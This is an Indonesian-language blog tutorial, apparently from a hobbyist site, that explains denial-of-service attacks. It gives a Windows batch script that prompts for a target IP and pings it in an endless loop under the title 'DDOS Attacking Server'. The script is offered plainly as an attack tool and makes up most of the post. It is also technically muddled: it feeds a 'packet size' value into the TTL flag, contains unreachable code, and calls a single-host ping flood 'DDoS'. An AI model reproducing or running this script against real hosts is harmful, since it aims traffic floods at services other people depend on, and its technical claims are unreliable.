Hae, berjumpa lagi dengan testa di O-Tech7. Kali ini testa akan ngasih tutorial ddos di notepad. Sebelumnya testa akan jelaskan apa itu Ddos. Serangan DoS (denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.
Oke langsung sadja gan.
1. Bahan-bahan
- Internet (internet penting buat ddos).
- Pc.
- Notepad
2. Langkah-langkah
- Pertama kita buka dulu notepad, dan tempel code dibawah ini :
@echo off
mode 67,16
title DDOS Attacking Server
color 0b
cls
echo =========================================
echo = Oc-Tech7 Ddos =
echo =========================================
echo.
echo =========================================
echo = Author : Oc-Tech7 =
echo = Website : www.oc-tech7.tk =
echo =========================================
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
- File Name : Ddos.bat
- Save as type : all files
- Selesai.
Sekian dulu, mohon maaf kalo ada yang kurang jelas.
Kalo ada yang kurang jelas bisa comment aja.
Author : Oc-Tech7

EmoticonEmoticon